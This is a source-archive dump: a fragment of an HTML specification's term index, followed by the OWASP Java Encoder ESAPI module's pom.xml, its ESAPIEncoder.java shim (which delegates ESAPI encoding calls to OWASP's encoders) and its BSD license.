ondurationchange onemptied onended onenter onerror onexit onfinish onfocus onhashchange oninput oninvalid onkeydown onkeypress onkeyup online online\n whitelist online\n whitelist namespaces online\n whitelist online\n whitelist namespace online\n whitelist wildcard flag online whitelist online whitelist\n section online whitelist\n wildcard flag online whitelist\n namespace online whitelist\n namespaces online whitelist\n wildcard flag online whitelist\n sections onload onloadeddata onloadedmetadata onloadstart only if border is not equivalent to zero onmessage onmousedown onmousemove onmouseout onmouseover onmouseup onmousewheel onnoupdate onobsolete onoffline ononline onpagehide onpageshow onpause onplay onplaying onpopstate onprogress onratechange onreadystatechange onreset onresize onscroll onseeked onseeking onselect onshow onstalled onstart onstorage onsubmit onsuspend ontimeupdate onunload onupdateready onvolumechange onwaiting open open() opener opener\n browsing context opener browsing\n context opener browsing\n context opener browsing context optgroup optimum optimum value option options or\n equivalent or\n equivalent or\n equivalent or\n equivalent or equivalent ordered set of\n unique space-separated tokens ordered set of unique\n space-separated tokens ordinal\n value ordinal value ordinary origin original\n insertion mode original\n insertion mode original insertion mode origins other\n applicable specifications other applicable specifications our\n public bug database outerHTML outline outline depth outlines output override\n URL override\n URL override URL ownerDocument p pagehide pageshow paragraph paragraphing paragraphs param parameter parameters parent parent\n browsing context parent browsing\n context parent browsing\n context parent browsing context parent browsing contexts parentNode parse\n error parse\n error parse\n error parse\n errors parse\n error parse\n errors parse a\n time-zone offset component parse a date or\n time string 
parse a date or time\n string parse a date or time string parse a time component parse error parse errors parse it as an integer parse that\n attribute's value parse that attribute's\n value parsed parser pause flag parses parsing\n a date parsing\n a time parsing\n a week string parsing a date parsing a date and\n time parsing a date and time parsing a global\n date and time parsing a global date and time parsing a month parsing a time parsing a week parsing the attribute as a non-negative\n integer partially available past\n names map past names map pathname pattern patternMismatch pause pause() pauseOnExit paused paused for user\n interaction paused for user interaction paused media\n controller paused media\n controller paused media controller pending\n parsing-blocking script pending\n application cache download process tasks pending application\n cache download process tasks pending application cache\n download process tasks pending application cache download process\n tasks pending parsing-blocking\n script pending parsing-blocking\n script pending parsing-blocking\n script pending parsing-blocking script pending table character\n tokens persisted personalbar phrasing phrasing\n content phrasing\n content phrasing\n content phrasing content pick placeholder placeholder\n label option placeholder label\n option placeholder label option plain text file plaintext platform play play() playback ended playback has\n ended playback has ended playbackRate played playing playing\n media controller playing media\n controller playing media\n controller plugin plugins plugins are being\n sandboxed plugins aren't being sandboxed poly popstate port position possible track categories poster poster\n frame poster\n frame poster frame potentially\n playing potentially CORS-enabled fetch potentially active potentially playing practical\n concerns pragma-set default\n language pragma-set default language pre pre-click activation\n steps pre-click activation steps preferred\n 
style sheet set preferred MIME\n name preferred MIME\n name preferred MIME\n name preferred MIME name preferred MIME names preferred style sheet set prefetch prefix match prefix match\n patterns preload prepare prepare a\n script prepare a\n script prepare a script prepare an\n event prepare an event presentational\n hint presentational\n hint presentational hint presentational hints prev prevents content\n from creating new auxiliary browsing contexts prevents content from\n navigating browsing contexts other than the sandboxed browsing\n context itself prevents content from\n navigating their top-level browsing context prevents script from\n reading from or writing to the document.cookie IDL\n attribute primary context print print when\n loaded print() printing\n steps printing steps process the iframe\n attributes process the iframe attributes processing model for navigating across\n documents progress prompt protected mode proto-URLs protocol provide provide a stable\n state provide such information provides a paint\n source provides a stable state pubDate pubdate public list of\n any patent disclosures public-html-comments@w3.org pushState pushState() q queryCommandEnabled queryCommandIndeterm queryCommandState queryCommandSupported queryCommandValue queue queue\n a task queue a\n task queue a\n task queue a\n task queue a\n task queue a\n task queue a\n task queue a post-load task queue a task queue that task as a post-load task queued quirks\n mode quirks mode radio radio button\n group radio button group radiogroup rangeOverflow rangeUnderflow rank ranked ratechange raw\n value raw text raw text elements raw value rb re-resolved read-only\n mode read-only mode read/write\n mode read/write mode readOnly readiness\n state readiness state readonly ready ready for\n post-load tasks ready for post-load\n tasks ready for post-load tasks readyState readystatechange rebuilding receiving a set-cookie-string reconstruct the active formatting elements reconstruction 
of\n the active formatting elements rect rectangle rectangle\n state redirect steps reentrant invocation of the\n parser reentrant invocation of the parser referrer reflect reflected reflecting refused to allow this document\n to be unloaded refused to allow the document to be\n unloaded refused to allow the document to be unloaded register the names registerContentHandler registerContentHandler() registerProtocolHandler registerProtocolHandler() rel rel="" relList relevant\n application caches relevant\n application cache relevant application caches reload reload\n override buffer reload\n override flag reload override\n flag reload override\n buffer reload override\n flag reload override buffer reload override flag remove removeCue removed removed from removed from a\n Document removed from a\n document removed from a document render the drag feedback rendered legend rendering rules replace replace() replaceState replaceState() replacement\n enabled replacement\n enabled replacement\n enabled replacement\n enabled replacement\n enabled replacement enabled replacement must be enabled report an error report the controller\n state report the controller state report the error reporting script errors represent represented represented by\n the collection represented by the\n collection represented by the\n collection represented by the collection represents required reset reset\n algorithm reset algorithm reset the form\n owner reset the form owner resettable resettable\n element resettable element resolve resolveURL resolved resolving resolving of relative URLs resolving relative URLs resource resource\n fetch algorithm resource fetch\n algorithm resource fetch\n algorithm resource fetch algorithm resource metadata management resource selection\n algorithm resource selection\n algorithm resource selection\n algorithm resource selection algorithm resource sharing check restrictions resulting\n autocompletion state resulting autocompletion\n state resulting 
autocompletion state return\n value return value returnValue returned to the script rev reversed right root\n element root\n element root\n element of a Document object root element row row\n groups row group row group\n headers row groups row header rowIndex rowSpan rowgroup rows rowspan rp rt rtl ruby rules rules\n for distinguishing if a resource is text or binary rules\n for parsing non-negative integers rules\n for updating the text track rendering rules for\n constructing the chapter tree from a text track rules for parsing\n manifests rules for parsing\n floating point number values rules for parsing\n integers rules for parsing\n floating point number values rules for parsing\n non-negative integers rules for parsing a\n legacy color value rules for parsing a hash-name reference rules for parsing a legacy\n color value rules for parsing a legacy color\n value rules for parsing a legacy color value rules for parsing a list of dimensions rules for parsing a list of integers rules for parsing dimension values rules for parsing floating\n point number values rules for parsing floating point\n number values rules for parsing floating point number\n values rules for parsing floating point number values rules for parsing integers rules for parsing non-negative\n integers rules for parsing non-negative\n integers rules for parsing non-negative\n integers rules for parsing non-negative integers rules for parsing signed integers rules for parsing simple color values rules for serializing simple color values rules for updating\n the text track rendering rules for updating the\n display of WebVTT text tracks rules for updating the display of\n WebVTT text tracks rules for updating the display of WebVTT\n text tracks rules for updating the display of WebVTT text\n tracks rules for updating the text\n track rendering rules for updating the text track\n rendering rules for updating the text track rendering run\n pre-click activation steps run\n canceled activation steps 
run canceled activation\n steps run post-click activation steps run pre-click\n activation steps run synthetic click\n activation steps run synthetic click activation\n steps run synthetic click activation steps runs s salvageable same same\n origin same\n origin same\n origin same\n origin same origin samp sandbox sandboxed\n automatic features browsing context flag sandboxed\n automatic features browsing context flag sandboxed\n navigation browsing context flag sandboxed\n top-level navigation browsing context flag sandboxed\n plugins browsing context flag sandboxed automatic features browsing\n context flag sandboxed forms\n browsing context flag sandboxed into a unique origin sandboxed navigation browsing context flag sandboxed origin\n browsing context flag sandboxed plugins browsing context flag sandboxed scripts browsing context flag sandboxed seamless iframes flag sandboxed top-level navigation browsing\n context flag satisfies its constraints satisfy its constraints satisfy their\n constraints scheme scope scoped script script\n content restrictions script\n data escaped state script\n execution environment script\n documentation script content restrictions script data\n state script data\n double escaped state script data\n escaped state script data\n state script data double escape end state script data double escape start\n state script data double escaped\n state script data double escaped dash\n state script data double escaped dash dash\n state script data double escaped less-than\n sign state script data double escaped state script data end tag name state script data end tag open state script data escape start dash\n state script data escape start state script data escaped dash dash\n state script data escaped dash state script data escaped end tag name\n state script data escaped end tag open state script data escaped less-than sign\n state script data escaped state script data less-than sign state script data state script documentation script 
error notifications script execution environment script nesting level script's\n browsing context script's\n document script's\n global object script's URL character\n encoding script's URL character\n encoding script's URL character encoding script's base URL script's browsing\n context script's browsing context script's document script's global\n object script's global\n object script's global object script-created parser scripting scripting disabled scripting flag scripting is\n disabled scripting is\n disabled scripting is disabled scripting is enabled scripting was enabled scripting was enabled or not scripts scroll scroll an element into view scroll to the fragment\n identifier scroll to the fragment identifier scrollAmount scrollDelay scrollbars scrolling seamless seamless\n browsing context flag seamless\n browsing context flag seamless\n iframe seamless browsing context flag search secondary\n browsing context secondary browsing\n context section section\n 6 of the W3C Patent Policy sectionRowIndex sectioning sectioning\n content sectioning\n content sectioning\n root sectioning content sectioning root sectioning roots sections secured seek seek the\n media controller seek the\n media controller seek the media\n controller seek the media controller seekable seeked seeking select select() selected selected\n coordinate selected\n files selected files selectedIndex selectedOptions selectedness selectionDirection selectionEnd selectionStart self self-closing start tag\n state self-closing start tag state sends a signal session\n history entry session\n histories session\n history session histories session history session history\n entry session history\n entry session history entries session history entry set\n of space-separated tokens set of\n scripts that will execute as soon as possible set of\n scripts that will execute as soon as possible set of\n comma-separated tokens set of comma-separated tokens set of space-separated\n tokens set of space-separated 
tokens set the document's address set the value of a new\n indexed property setCustomValidity setCustomValidity() setData setDragImage setDragImage() setInterval setInterval() setSelectionRange setSelectionRange() setTimeout setTimeout() setter setter creator shape sheet should be used showModalDialog showModalDialog() showing showing by\n default showing by default shows caching\n progress shows caching progress simple\n color simple\n color simple color single page HTML size sizes skip White_Space\n characters slaved slaved\n media elements slaved\n media elements slaved media\n elements slaved media\n elements slaved media element slaved media elements slide slots small snapToLines sniffed type of the\n resource soft source source\n node source\n node source\n browsing context source\n browsing context source browsing\n context source browsing\n context source browsing\n context source browsing context source node space\n characters space\n characters space\n character space\n characters space\n characters space\n characters space character space characters spacer span special specially focusable specified specifies specifies an\n operation specify an\n operation spellcheck spin the event loop spins\n the event loop split it on\n spaces split on\n spaces split on\n spaces split on spaces split the\n attribute's value on spaces split the\n string on commas split the attribute value on commas split the attribute's\n value on spaces split the content\n attribute on spaces splitting value on spaces splitting on commas src srcdoc srclang stack\n of open elements stack\n of open elements stack of\n open elements stack of\n open elements stack of\n open elements stack of open\n elements stack of open\n elements stack of open\n elements stack of open\n elements stack of open\n elements stack of open elements stall timeout stalled standby start start\n tag start\n times start tag start time start times startOffsetTime startTime state state\n objects state object state 
objects statically validate the\n constraints status statusbar step step\n base step base step scale\n factor step scale factor stepDown stepDown() stepMismatch stepUp stepUp() steps to expose a\n media-resource-specific text track stop stop parsing stopped stopped due to errors stopped parsing stops stops\n parsing storage\n mutex storage mutex strictly splitting the\n string strike strip leading\n and trailing whitespace strip leading and\n trailing whitespace strip leading and\n trailing whitespace stripped line breaks stripping leading and trailing whitespace strong structured\n clone structured\n clone structured clone style style rule suggested in the rendering\n section style sheet\n ready style sheet ready stylesheet styling processing\n model styling processing model sub submit submit\n button submit\n buttons submit button submit buttons submit() submittable submittable elements submitted submitting subscribe subtitle subtitles suffer from a step\n mismatch suffer from a step mismatch suffering from a\n type mismatch suffering from a custom\n error suffering from a custom error suffering from a pattern mismatch suffering from a step mismatch suffering from a type mismatch suffering from an\n overflow suffering from an\n underflow suffering from an overflow suffering from an underflow suffering from being\n missing suffering from being missing suffering from being too long suggestions\n source element suggestions source\n element suggestions source element summary sup support the scripting\n language supported\n property names supported property\n indices supported property indices supported property names supporting the suggested\n default rendering suspend svg swapCache swapCache() synchronous\n section synchronous\n section synchronous\n sections synchronous\n section synchronous section synchronous sections syntax for which tBodies tFoot tHead tabIndex tabindex table table\n model table layout techniques table model table model\n errors table model 
error tables tag tag\n name state tag cloud tag name tag name\n state tag open state tags target target element task task\n queue task\n queue task\n queues task\n queues task\n source task\n queue task queue task queues task source task sources tasks tbody td techniques for describing\n tables tel temporary\n buffer temporary buffer term text text\n track cue writing direction text\n track text\n track cue writing direction text\n track text\n nodes text\n track text\n track cue active flag text\n track kind text\n tracks text\n node text\n track text\n track cue size text\n track cue writing direction text\n track mode text\n tracks text field text node text nodes text track text track\n cue text track\n mode text track\n cue order text track\n cues text track\n cue text track\n cue display state text track\n cue start time text track\n kind text track\n label text track\n mode text track\n cue text track\n cues text track\n mode text track\n readiness state text track cue text track cue\n display state text track cue\n pause-on-exit flag text track cue\n active flag text track cue\n end time text track cue\n identifier text track cue\n pause-on-exit flag text track cue\n size text track cue\n start time text track cue\n text text track cue\n writing direction text track cue\n identifier text track cue\n order text track cue\n pause-on-exit flag text track cue\n size text track cue\n text text track cue active\n flag text track cue active\n flag text track cue active flag text track cue display state text track cue end\n time text track cue end\n time text track cue end time text track cue identifier text track cue order text track cue pause-on-exit\n flag text track cue pause-on-exit\n flag text track cue pause-on-exit flag text track cue size text track cue start\n time text track cue start\n time text track cue start time text track cue text text track cue writing\n direction text track cue writing direction text track cues text track disabled text track 
failed to load text track hidden text track kind text track label text track language text track list of cues text track loaded text track loading text track mode text track not loaded text track readiness\n state text track readiness\n state text track readiness state text track showing text tracks text-level semantics\n usage summary text/cache-manifest text/html text/plain textContent textLength textPosition textTracks textTracks[ textarea textarea effective height textarea effective width tfoot th that algorithm the\n resource's Content-Type metadata the\n script block's type the\n script block's type the\n resource's Content-Type metadata the\n directionality the\n document's address the\n title element the\n address the\n directionality the\n document's current address the\n script block's type the\n title element the\n conditions described above the\n incumbent body element the\n html element the\n HTML syntax the\n active formatting elements are reconstructed the\n body element the\n directionality the\n document's address the\n document's current address the\n drag data item kind the\n link is an alternative stylesheet the\n rules for choosing a browsing context given a browsing context\n name the\n script settings determined from the node the Document's address the applet\n element the embed element the head\n element the head element the html element the object element the title\n element the title element the origin it was\n assigned when its browsing context was created the HTML\n syntax the HTML syntax the URL given by this\n link the W3C CVS server the XHTML\n syntax the XHTML\n syntax the XHTML syntax the attributes common to all media\n elements the body\n element the body\n element the body\n element the body element the current address the directionality the document's\n address the document's\n current address the document's\n address the document's address the document's current\n address the document's current address the document's domain the 
drag data\n item type string the drag data item\n kind the drag data item\n kind the drag data item\n kind the drag data item kind the drag data item type\n string the drag data item type string the encoding of the\n document itself the event handler processing algorithm the example in the File\n Upload state section the handling for misnested tags the indicated part of the\n document the indicated part of the\n document the indicated part of the document the link is an\n alternative stylesheet the location bar BarProp\n object the manifest the menu bar BarProp\n object the next step the personal bar BarProp\n object the rendering section the requirements given in the prose the resource's Content-Type\n metadata the resource's Content-Type\n metadata the rules\n described previously the rules for choosing a\n browsing context given a browsing context name the rules for choosing a browsing context given a\n browsing context name the rules for choosing a browsing context given a browsing\n context name the script\n block's type the script\n settings determined from the node the script block's\n character encoding the script block's\n type the script block's\n type the script block's character encoding the script block's fallback character\n encoding the script block's fallback character\n encoding the script block's source the script block's type the scrollbar BarProp\n object the section on\n footnotes the section the linking element is most\n closely associated with the sniffed type of the resource the stack the status bar BarProp\n object the step labeled\n "fragment identifiers" the text tracks are ready the toolbar BarProp\n object thead their document's current\n address this this is\n a reference, not a copy this is a reference, not a copy through which time time-zone\n offset time-zone offset timeline\n offset timeline offset timeupdate title toBlob toDataURL toDataURL() toggle tokenization tokenizer tooLong toolbar top top-level\n browsing context 
top-level\n browsing context top-level\n browsing context top-level browsing\n context top-level browsing\n context top-level browsing\n context top-level browsing\n context top-level browsing\n contexts top-level browsing context top-level browsing contexts tr track track\n URL track\n label track URL track label track language trademark transparent transparently follow the redirect traverse the\n history by a delta traverse the history by\n a delta traverse the history by a\n delta traverse the history by a delta traversing the\n history tree\n order tree\n order tree\n construction tree\n order tree construction tree order true-by-default trueSpeed truespeed trusted tt turn off turned off turned on type type\n sniffing rules type blacklist type information type string typeMismatch typeMustMatch typemustmatch types u ul unavailable undo transaction history unfocusing\n steps unfocusing steps unique\n identifier unique identifier unique identifier (ID) unit\n of related similar-origin browsing contexts unit of\n related similar-origin browsing contexts unit of related browsing\n contexts unit of related browsing contexts unit of related similar-origin browsing\n contexts unit of related similar-origin browsing contexts unload a\n document unload a document unloading document cleanup steps unordered\n set of unique space-separated tokens unordered set of unique\n space-separated tokens unordered set of unique space-separated tokens unquoted unregisterContentHandler unregisterProtocolHandler up update update\n status update status update the\n image data update the\n session history with the new page update the image data update the session\n history with the new page update the session history with\n the new page update the session history with the new\n page update the session history with the new page updated the image\n data updateready updating the session history with\n the new page upgrade\n attempt upgrade\n attempt upgrade attempt use the plugin that 
supports resource type use-credentials useMap used during the parsing usemap user\n interaction task source user interaction user interaction task\n source user interaction task\n source user interaction task source userAgent using the\n rules for using the rules for vAlign vCard MIME Directory\n Profile vLink valid valid\n URL valid\n integer valid\n MIME type valid\n date string valid\n date string in content with optional time valid\n floating point number valid\n floating point numbers valid\n forced-UTC global date and time string valid\n global date and time string valid\n integer valid\n local date and time string valid\n media query valid\n month string valid\n non-empty URL potentially surrounded by spaces valid\n non-negative integers valid\n simple color valid\n time string valid\n week string valid MIME\n type valid MIME type valid MIME type with no parameters valid MIME types with no parameters valid URL valid URL\n potentially surrounded by spaces valid URL potentially\n surrounded by spaces valid URL potentially surrounded by\n spaces valid browsing\n context name or keyword valid browsing\n context names or keywords valid browsing context\n name valid browsing context\n name or keyword valid browsing context name valid browsing context name\n or keyword valid date\n string valid date or\n time string valid date or time string valid date or time string in content valid date string valid date string with\n optional time valid date string with optional\n time valid e-mail address valid e-mail address\n list valid e-mail address list valid floating\n point number valid floating point\n number valid floating point\n numbers valid floating point number valid floating point numbers valid forced-UTC\n global date and time string valid forced-UTC global date and time\n string valid global\n date and time string valid global date and\n time strings valid global date and\n time string valid global date and time\n string valid global date and time string valid 
hash-name reference valid integer valid integers valid list of\n integers valid local date and\n time string valid local date and time\n string valid local date and time string valid lowercase simple color valid media query valid month\n string valid month string valid non-empty\n URL potentially surrounded by spaces valid non-empty URL valid non-empty URL potentially\n surrounded by spaces valid non-empty URL potentially surrounded by\n spaces valid non-negative\n integer valid non-negative\n integers valid non-negative integer valid simple color valid time\n string valid time string valid week\n string valid week string validationMessage validity validity states valign value value\n sanitization algorithm value mode\n flag value mode flag value sanitization\n algorithm value sanitization\n algorithm value sanitization algorithm values valueAsDate valueAsDate valueAsNumber valueMissing valueType values values are\n reset valuetype var various W3C HTML WG\n lists various WHATWG lists version vertical\n growing right vertical growing\n left vertical growing\n right vertical growing\n left vertical growing left vertical growing right video videoHeight videoTracks videoWidth violation visible vlink vlinkColor void elements volume volumechange vspace waiting wbr web developer edition week week number of\n the last day week number of the last day whatwg@whatwg.org when the metadata of the clip becomes\n known whitelisted scheme whitespace whitespace trimming width width of the\n select's labels will will\n not will be fired will cause willValidate willful\n violation willful violation window window.alert() window.applicationCache window.close() window.open() wrap write writeln writing direction xml:base xml:lang xmp yet more restrictions yieldForStorageUpdates 
owasp-java-encoder-1.2.3/esapi/000077500000000000000000000000001375203724500163135ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/pom.xml000066400000000000000000000052611375203724500176340ustar00rootroot00000000000000 4.0.0 org.owasp.encoder encoder-parent 1.2.3 encoder-esapi jar ESAPI Thunk The OWASP Encoders ESAPI Thunk provides an easy way to plugin the Encoder Projects API into an implementation of ESAPI. org.owasp.encoder encoder ${project.parent.version} org.owasp.esapi esapi [2.2,3) owasp-java-encoder-1.2.3/esapi/src/000077500000000000000000000000001375203724500171025ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/main/000077500000000000000000000000001375203724500200265ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/main/java/000077500000000000000000000000001375203724500207475ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/main/java/org/000077500000000000000000000000001375203724500215365ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/main/java/org/owasp/000077500000000000000000000000001375203724500226675ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/main/java/org/owasp/encoder/000077500000000000000000000000001375203724500243065ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/main/java/org/owasp/encoder/esapi/000077500000000000000000000000001375203724500254075ustar00rootroot00000000000000owasp-java-encoder-1.2.3/esapi/src/main/java/org/owasp/encoder/esapi/ESAPIEncoder.java000066400000000000000000000227241375203724500304220ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. 
//
//     * Redistributions in binary form must reproduce the above
//       copyright notice, this list of conditions and the following
//       disclaimer in the documentation and/or other materials
//       provided with the distribution.
//
//     * Neither the name of the OWASP nor the names of its
//       contributors may be used to endorse or promote products
//       derived from this software without specific prior written
//       permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
// OF THE POSSIBILITY OF SUCH DAMAGE.

package org.owasp.encoder.esapi;

import java.io.IOException;
import java.net.URI;
import org.owasp.encoder.Encode;
import org.owasp.esapi.Encoder;
import org.owasp.esapi.codecs.Codec;
import org.owasp.esapi.errors.EncodingException;
import org.owasp.esapi.reference.DefaultEncoder;

/**
 * ESAPIEncoder is a singleton implementation of the ESAPI Encoder API.  It
 * is meant to allow quick and easy drop-in replacement of the default
 * encoder included with the ESAPI library, as the Encoder libraries are
 * faster and use less memory and thus cause fewer garbage collections.
 *
 * <p>Please note that the OWASP Java Encoders do not implement all
 * the encodings of the ESAPI Encoder API.  In such situations this
 * implementation will fall back onto the default reference implementation
 * included with ESAPI.  Thus you should see the performance benefit from
 * the methods included in the Encoder, but still maintain compatibility
 * with all methods from the ESAPI Encoder.</p>
 *
 * <p>For clarity, the reason the OWASP Java Encoders do not include some
 * of the ESAPI library is that the Encoders library is specifically focused
 * on encoding, and thus does not include:</p>
 *
 * <ul>
 *   <li>Input validation/normalization methods:
 *   {@link org.owasp.esapi.Encoder#canonicalize(String)},
 *   {@link org.owasp.esapi.Encoder#canonicalize(String, boolean)},
 *   {@link org.owasp.esapi.Encoder#canonicalize(String, boolean, boolean)},
 *   {@link org.owasp.esapi.Encoder#getCanonicalizedURI(URI)}</li>
 *
 *   <li>Decoding methods:
 *   {@link org.owasp.esapi.Encoder#decodeForHTML(String)},
 *   {@link org.owasp.esapi.Encoder#decodeFromURL(String)}</li>
 *
 *   <li>Binary-to-text/text-to-binary:
 *   {@link org.owasp.esapi.Encoder#encodeForBase64(byte[], boolean)},
 *   {@link org.owasp.esapi.Encoder#decodeFromBase64(String)}</li>
 *
 *   <li>Bind-able APIs (such as {@link java.sql.PreparedStatement}):
 *   {@link org.owasp.esapi.Encoder#encodeForSQL(org.owasp.esapi.codecs.Codec, String)},
 *   {@link org.owasp.esapi.Encoder#encodeForXPath(String)},
 *   {@link org.owasp.esapi.Encoder#encodeForOS(org.owasp.esapi.codecs.Codec, String)}</li>
 *
 *   <li>Rarely-used or alternate compatible encoding:
 *   {@link org.owasp.esapi.Encoder#encodeForVBScript(String)},
 *   {@link org.owasp.esapi.Encoder#encodeForLDAP(String)},
 *   {@link org.owasp.esapi.Encoder#encodeForLDAP(String, boolean)},
 *   {@link org.owasp.esapi.Encoder#encodeForDN(String)}</li>
 * </ul>
 *
 * <p>(Please note that with sufficient feedback from the user base, the
 * above-mentioned methods may be implemented in future releases of the OWASP
 * Java Encoders; if/when that happens, this shim class will be updated to
 * call out to the new methods.)</p>
 *
 * <p>You may notice that this class does not actually implement Encoder
 * itself.  Instead it simply provides a {@link #getInstance()} method that
 * does.  This allows the implementation details maximum flexibility by not
 * creating any public API that would restrict changes later.</p>
 *
 * @author jeffi
 */
public final class ESAPIEncoder {
    /** No instances. */
    private ESAPIEncoder() {}

    /**
     * Returns an instance of the Encoder.  This method is the only supported
     * mechanism by which an ESAPIEncoder instance should be obtained.  The
     * returned implementation is guaranteed to be thread-safe for the methods
     * that the OWASP Java Encoders implement (see class documentation).
     * Though not a requirement of the ESAPI Encoder API, the returned value
     * is also serializable.
     *
     * @return An encoder implementation that uses the OWASP Java Encoders
     * for most of the common encoding methods.
     */
    public static Encoder getInstance() {
        return Impl.INSTANCE;
    }

    /**
     * This is the private singleton that implements the ESAPI Encoder shim.
     * It is implemented as a single-value enum to get all the "free" singleton
     * properties associated with enums--such as serialization, and on-demand
     * initialization.
     *
     * <p>The implementation is intentionally private to avoid any API baggage.
     * The instance should be obtained using
     * {@link org.owasp.encoder.esapi.ESAPIEncoder#getInstance()}.</p>
     */
    private enum Impl implements Encoder {
        /**
         * The singleton instance.
         */
        INSTANCE;

        /**
         * The reference encoder from ESAPI.  Any ESAPI method without an
         * OWASP Java Encoder equivalent is delegated to this instance.
         */
        private final Encoder _referenceEncoder = DefaultEncoder.getInstance();

        /** {@inheritDoc} */
        public String canonicalize(String s) {
            return _referenceEncoder.canonicalize(s);
        }

        /** {@inheritDoc} */
        public String canonicalize(String s, boolean strict) {
            return _referenceEncoder.canonicalize(s, strict);
        }

        /** {@inheritDoc} */
        public String canonicalize(String s, boolean restrictMultiple, boolean restrictMixed) {
            return _referenceEncoder.canonicalize(s, restrictMultiple, restrictMixed);
        }

        /** {@inheritDoc} */
        public String getCanonicalizedURI(URI dirtyUri) {
            return _referenceEncoder.getCanonicalizedURI(dirtyUri);
        }

        /** {@inheritDoc} */
        public String encodeForCSS(String s) {
            return Encode.forCssString(s);
        }

        /** {@inheritDoc} */
        public String encodeForHTML(String s) {
            return Encode.forHtml(s);
        }

        /** {@inheritDoc} */
        public String decodeForHTML(String s) {
            return _referenceEncoder.decodeForHTML(s);
        }

        /** {@inheritDoc} */
        public String encodeForHTMLAttribute(String s) {
            return Encode.forHtmlAttribute(s);
        }

        /** {@inheritDoc} */
        public String encodeForJavaScript(String s) {
            return Encode.forJavaScript(s);
        }

        /** {@inheritDoc} */
        public String encodeForVBScript(String s) {
            return _referenceEncoder.encodeForVBScript(s);
        }

        /** {@inheritDoc} */
        public String encodeForSQL(Codec codec, String s) {
            return _referenceEncoder.encodeForSQL(codec, s);
        }

        /** {@inheritDoc} */
        public String encodeForOS(Codec codec, String s) {
            return _referenceEncoder.encodeForOS(codec, s);
        }

        /** {@inheritDoc} */
        public String encodeForLDAP(String s) {
            return _referenceEncoder.encodeForLDAP(s);
        }

        /** {@inheritDoc} */
        public String encodeForLDAP(String s, boolean b) {
            return _referenceEncoder.encodeForLDAP(s, b);
        }

        /** {@inheritDoc} */
        public String encodeForDN(String s) {
            return _referenceEncoder.encodeForDN(s);
        }

        /** {@inheritDoc} */
        public String encodeForXPath(String s) {
            return _referenceEncoder.encodeForXPath(s);
        }

        /** {@inheritDoc} */
        public String encodeForXML(String s) {
            return Encode.forXml(s);
        }

        /** {@inheritDoc} */
        public String encodeForXMLAttribute(String s) {
            return Encode.forXmlAttribute(s);
        }

        /** {@inheritDoc} */
        public String encodeForURL(String s) throws EncodingException {
            return Encode.forUri(s);
        }

        /** {@inheritDoc} */
        public String decodeFromURL(String s) throws EncodingException {
            return _referenceEncoder.decodeFromURL(s);
        }

        /** {@inheritDoc} */
        public String encodeForBase64(byte[] bytes, boolean wrap) {
            return _referenceEncoder.encodeForBase64(bytes, wrap);
        }

        /** {@inheritDoc} */
        public byte[] decodeFromBase64(String s) throws IOException {
            return _referenceEncoder.decodeFromBase64(s);
        }
    }
}

owasp-java-encoder-1.2.3/esapi/src/main/resources/000077500000000000000000000000001375203724500220405ustar00rootroot00000000000000
owasp-java-encoder-1.2.3/esapi/src/main/resources/META-INF/000077500000000000000000000000001375203724500232005ustar00rootroot00000000000000
owasp-java-encoder-1.2.3/esapi/src/main/resources/META-INF/LICENSE000066400000000000000000000027711375203724500242140ustar00rootroot00000000000000
Copyright (c) 2015 Jeff Ichnowski
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:

    * Redistributions of source code must retain the above
      copyright notice, this list of conditions and the following
      disclaimer.

    * Redistributions in binary form must reproduce the above
      copyright notice, this list of conditions and the following
      disclaimer in the documentation and/or other materials
      provided with the distribution.

    * Neither the name of the OWASP nor the names of its
      contributors may be used to endorse or promote products
      derived from this software without specific prior written
      permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
OF THE POSSIBILITY OF SUCH DAMAGE.

owasp-java-encoder-1.2.3/esapi/src/site/000077500000000000000000000000001375203724500200465ustar00rootroot00000000000000
